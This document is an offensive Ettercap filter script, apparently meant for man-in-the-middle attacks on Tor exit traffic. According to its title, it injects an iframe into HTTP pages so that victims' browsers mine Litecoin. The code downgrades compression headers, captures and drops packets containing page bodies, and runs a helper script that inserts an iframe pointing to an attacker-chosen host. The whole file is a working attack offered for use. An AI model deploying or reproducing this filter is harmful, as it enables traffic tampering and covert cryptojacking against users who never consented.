###  PWN TOR and hash LTC ###
########## oxagast ##########

# change iframe src= to your /lm host location.

if (ip.proto == TCP) {
  if (tcp.src == 80 || tcp.dst == 80) {
    if (search(DATA.data, "gzip,deflate")) {
      replace("gzip,deflate", "            ");   # kill gzip
    }
    if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Naddah!!");  # kill encoding
    }
    if (search(DATA.data, "<body")) {
      execinject("rm tmp/pagedata 2>/dev/null"); # make sure its not there
      log(DATA.data, "tmp/pagedata"); # log the packet
      drop();  # drop it so it doesn't go through
      execinject("./injectme.pl tmp/pagedata");
      # remove the comments to make space, inject our iframe, then insert the right number of spaces to fill the void in packet to get right offset
    }
  }
}

